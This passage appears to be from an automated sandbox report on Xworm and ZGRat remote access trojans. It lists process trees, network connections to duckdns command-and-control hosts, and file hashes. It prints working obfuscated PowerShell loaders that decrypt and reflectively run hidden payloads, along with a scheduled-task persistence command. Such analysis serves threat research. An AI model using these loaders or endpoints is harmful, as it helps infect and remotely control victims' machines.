vJfVF($ktYNE){$OYIYV=[System.Security.Cryptography.Aes]::Create();$OYIYV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OYIYV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OYIYV.Key=[System.Convert]::($GZdQ[12])('HessG9Sp8I98uzvuAQwIGoeAOpm2R4JZwqif+tn9mzM=');$OYIYV.IV=[System.Convert]::($GZdQ[12])('Sq8oY624DUi5D/0NV4f3lQ==');$NPmYK=$OYIYV.($GZdQ[3])();$clLIZ=$NPmYK.($GZdQ[10])($ktYNE,0,$ktYNE.Length);$NPmYK.Dispose();$OYIYV.Dispose();$clLIZ;}function JqmHs($ktYNE){$fhwpD=New-Object System.IO.MemoryStream(,$ktYNE);$yEEHb=New-Object System.IO.MemoryStream;$CPPWk=New-Object System.IO.Compression.GZipStream($fhwpD,[IO.Compression.CompressionMode]::($GZdQ[8]));$CPPWk.($GZdQ[9])($yEEHb);$CPPWk.Dispose();$fhwpD.Dispose();$yEEHb.Dispose();$yEEHb.ToArray();}$rlqXf=[System.IO.File]::($GZdQ[2])([Console]::Title);$bUDiU=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 5).Substring(2))));$hdfCS=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 6).Substring(2))));[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$hdfCS).($GZdQ[5]).($GZdQ[0])($null,$null);[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$bUDiU).($GZdQ[5]).($GZdQ[0])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 216.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 52.111.229.43:443 tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp

Files

memory/3676-0-0x000001C4FD590000-0x000001C4FD5B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orbceapg.1ev.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3676-10-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp

memory/3676-12-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-11-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-13-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-14-0x000001C500000000-0x000001C500044000-memory.dmp

memory/3676-15-0x000001C500050000-0x000001C5000C6000-memory.dmp

memory/3292-25-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp

memory/3292-26-0x0000028E360B0000-0x0000028E360C0000-memory.dmp

memory/3292-29-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp

memory/3676-30-0x000001C498020000-0x000001C498034000-memory.dmp

memory/3676-31-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp

memory/3676-32-0x00007FFD39950000-0x00007FFD39A0E000-memory.dmp

memory/3676-33-0x000001C4982F0000-0x000001C498300000-memory.dmp

memory/3676-34-0x000001C498300000-0x000001C498316000-memory.dmp

memory/3676-35-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp

memory/3676-37-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp

memory/3676-38-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-39-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-40-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp

memory/3676-41-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

91s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fresh.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2360 set thread context of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2360 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 1388 wrote to memory of 3488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1388 wrote to memory of 3488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1388 wrote to memory of 3488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2360 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fresh.exe

"C:\Users\Admin\AppData\Local\Temp\fresh.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Local\Temp\bddddsx"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\fresh.exe" "C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 vbdsg.duckdns.org udp
GB 57.128.155.22:8896 vbdsg.duckdns.org tcp
US 8.8.8.8:53 22.155.128.57.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp

Files

memory/2360-0-0x00000000008A0000-0x00000000008CE000-memory.dmp

memory/2360-1-0x0000000074450000-0x0000000074C00000-memory.dmp

memory/2360-2-0x0000000005210000-0x0000000005220000-memory.dmp

memory/2360-3-0x0000000005290000-0x00000000052F6000-memory.dmp

memory/2360-4-0x00000000058B0000-0x0000000005E54000-memory.dmp

memory/5072-5-0x0000000000400000-0x0000000000410000-memory.dmp

memory/5072-6-0x00000000051F0000-0x000000000528C000-memory.dmp

memory/5072-7-0x0000000074450000-0x0000000074C00000-memory.dmp

memory/2360-11-0x0000000074450000-0x0000000074C00000-memory.dmp

memory/5072-12-0x0000000005450000-0x0000000005460000-memory.dmp

memory/5072-13-0x0000000005B00000-0x0000000005B92000-memory.dmp

memory/5072-14-0x0000000005AA0000-0x0000000005AAA000-memory.dmp

memory/5072-15-0x0000000074450000-0x0000000074C00000-memory.dmp

memory/5072-16-0x0000000005450000-0x0000000005460000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:51

Platform

win10v2004-20240412-en

Max time kernel

77s

Max time network

92s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3568 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3568 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3568 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3568 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4908 wrote to memory of 5084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4908 wrote to memory of 5084 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 3092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 3092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 3796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5084 wrote to memory of 3796 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3796 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3796 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3796 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 1020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5084 wrote to memory of 1020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1020 wrote to memory of 1880 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 1880 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 1880 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5084 wrote to memory of 692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5084 wrote to memory of 404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5084 wrote to memory of 404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 404 wrote to memory of 1548 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 404 wrote to memory of 1548 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 404 wrote to memory of 1548 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd';$LILq='LGNGQoGNGQadGNGQ'.Replace('GNGQ', ''),'ElevbZPmvbZPenvbZPtvbZPAvbZPtvbZP'.Replace('vbZP', ''),'InUMsVvoUMsVkUMsVeUMsV'.Replace('UMsV', ''),'CopFijyyTFijyoFijy'.Replace('Fijy', ''),'CZakhhaZakhnZakhgeEZakhxtZakhenZakhsZakhioZakhnZakh'.Replace('Zakh', ''),'ReyUhbayUhbdyUhbLiyUhbnesyUhb'.Replace('yUhb', ''),'SOZpUplOZpUitOZpU'.Replace('OZpU', ''),'TrMlaCanMlaCsMlaCfMlaCoMlaCrMlaCmFiMlaCnalMlaCBlMlaCockMlaC'.Replace('MlaC', ''),'MaXOkGiXOkGnXOkGModXOkGulXOkGeXOkG'.Replace('XOkG', ''),'EnkMdetrykMdePokMdeinkMdetkMde'.Replace('kMde', ''),'FrwpnfomwpnfBawpnfse6wpnf4Stwpnfrwpnfingwpnf'.Replace('wpnf', ''),'GemcvPtCmcvPurmcvPrmcvPenmcvPtPrmcvPocmcvPessmcvP'.Replace('mcvP', ''),'DecxpgKoxpgKmxpgKpxpgKresxpgKsxpgK'.Replace('xpgK', ''),'CrtTyceattTycetTycDetTyccrtTycypttTycortTyc'.Replace('tTyc', '');powershell -w hidden;function aPNpf($nVNGI){$htbMs=[System.Security.Cryptography.Aes]::Create();$htbMs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$htbMs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$htbMs.Key=[System.Convert]::($LILq[10])('/MlRmzNe+ZzBdBywbWhCQRBk9F+NMckIyZTwiuahK6M=');$htbMs.IV=[System.Convert]::($LILq[10])('XI44fhXZ241HbBx9GSgTSw==');$jJhvE=$htbMs.($LILq[13])();$EHnru=$jJhvE.($LILq[7])($nVNGI,0,$nVNGI.Length);$jJhvE.Dispose();$htbMs.Dispose();$EHnru;}function vSJcW($nVNGI){$EemcA=New-Object System.IO.MemoryStream(,$nVNGI);$NFsIp=New-Object System.IO.MemoryStream;$lBDbC=New-Object System.IO.Compression.GZipStream($EemcA,[IO.Compression.CompressionMode]::($LILq[12]));$lBDbC.($LILq[3])($NFsIp);$lBDbC.Dispose();$EemcA.Dispose();$NFsIp.Dispose();$NFsIp.ToArray();}$HrliX=[System.IO.File]::($LILq[5])([Console]::Title);$cGEtH=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 5).Substring(2))));$IdyPm=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 6).Substring(2))));[System.Reflection.Assembly]::($LILq[0])([byte[]]$IdyPm).($LILq[9]).($LILq[2])($null,$null);[System.Reflection.Assembly]::($LILq[0])([byte[]]$cGEtH).($LILq[9]).($LILq[2])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Epbiwzhzg = Get-Content 'C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat' | select-object -Last 1; $Pidhuf = [System.Convert]::FromBase64String($Epbiwzhzg);$Kfgkov = New-Object System.IO.MemoryStream( , $Pidhuf );$Rtzup = New-Object System.IO.MemoryStream;$Hvtlgiqv = New-Object System.IO.Compression.GzipStream $Kfgkov, ([IO.Compression.CompressionMode]::Decompress);$Hvtlgiqv.CopyTo( $Rtzup );$Hvtlgiqv.Close();$Kfgkov.Close();[byte[]] $Pidhuf = $Rtzup.ToArray();[Array]::Reverse($Pidhuf); $Ujrulpn = [System.Threading.Thread]::GetDomain().Load($Pidhuf); $Gkwzgehresm = $Ujrulpn.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qiygww.cmd" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Lqctry = Get-Content 'C:\Users\Admin\AppData\Local\Temp\qiygww.cmd' | select-object -Last 1; $Gepinqdfw = [System.Convert]::FromBase64String($Lqctry);$Smjhpgfd = New-Object System.IO.MemoryStream( , $Gepinqdfw );$Ebvvkvbqat = New-Object System.IO.MemoryStream;$Ouefwyswci = New-Object System.IO.Compression.GzipStream $Smjhpgfd, ([IO.Compression.CompressionMode]::Decompress);$Ouefwyswci.CopyTo( $Ebvvkvbqat );$Ouefwyswci.Close();$Smjhpgfd.Close();[byte[]] $Gepinqdfw = $Ebvvkvbqat.ToArray();[Array]::Reverse($Gepinqdfw); $Tyossrcg = [System.Threading.Thread]::GetDomain().Load($Gepinqdfw); $Tzmchvhv = $Tyossrcg.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mfgpgc.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ixgyed.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Wogaptd = Get-Content 'C:\Users\Admin\AppData\Local\Temp\ixgyed.bat' | select-object -Last 1; $Bbvjyjl = [System.Convert]::FromBase64String($Wogaptd);$Osqqdzvqkq = New-Object System.IO.MemoryStream( , $Bbvjyjl );$Ooivncxsvx = New-Object System.IO.MemoryStream;$Ouqoommak = New-Object System.IO.Compression.GzipStream $Osqqdzvqkq, ([IO.Compression.CompressionMode]::Decompress);$Ouqoommak.CopyTo( $Ooivncxsvx );$Ouqoommak.Close();$Osqqdzvqkq.Close();[byte[]] $Bbvjyjl = $Ooivncxsvx.ToArray();[Array]::Reverse($Bbvjyjl); $Bjklpyasha = [System.Threading.Thread]::GetDomain().Load($Bbvjyjl); $Pldyxr = $Bjklpyasha.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 216.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 jdokds.duckdns.org udp
GB 57.128.155.22:8895 jdokds.duckdns.org tcp
US 8.8.8.8:53 22.155.128.57.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_soxeb2uu.sji.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5084-9-0x000001F4623D0000-0x000001F4623F2000-memory.dmp

memory/5084-10-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp

memory/5084-11-0x000001F447ED0000-0x000001F447EE0000-memory.dmp

memory/5084-12-0x000001F447ED0000-0x000001F447EE0000-memory.dmp

memory/5084-13-0x000001F4627A0000-0x000001F4627E4000-memory.dmp

memory/5084-14-0x000001F462870000-0x000001F4628E6000-memory.dmp

memory/3092-17-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp

memory/3092-22-0x0000023EE9700000-0x0000023EE9710000-memory.dmp

memory/3092-21-0x0000023EE9700000-0x0000023EE9710000-memory.dmp

memory/3092-29-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp

memory/5084-30-0x000001F462430000-0x000001F462444000-memory.dmp

memory/5084-31-0x00007FFD26E90000-0x00007FFD27085000-memory.dmp

memory/5084-32-0x00007FFD266B0000-0x00007FFD2676E000-memory.dmp

memory/5084-34-0x000001F4627F0000-0x000001F4627FE000-memory.dmp

memory/5084-33-0x000001F462440000-0x000001F46244C000-memory.dmp

memory/5084-35-0x000001F447ED0000-0x000001F447EE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat

MD5 7834dbd67492fa350447dbd5debda5fc
SHA1 e008dff36158beb0425d32036d9f65d5653184bd
SHA256 d96f10a2672eb846ecb66d836dfe82933aca60094a367a90eee3aac0444a5573
SHA512 02ac02dfd61f1ce96f79899523aedd6efd26a269bfecf4507ad3008fa384f9f2d9c9fac71664f7f0b1f6bdf6a397ee6757c199c0971f0b9803409f0c48d7206a

memory/1464-42-0x0000000005000000-0x0000000005036000-memory.dmp

memory/1464-41-0x0000000074AE0000-0x0000000075290000-memory.dmp

memory/5084-45-0x000001F447ED0000-0x000001F447EE0000-memory.dmp

memory/1464-47-0x00000000057A0000-0x0000000005DC8000-memory.dmp

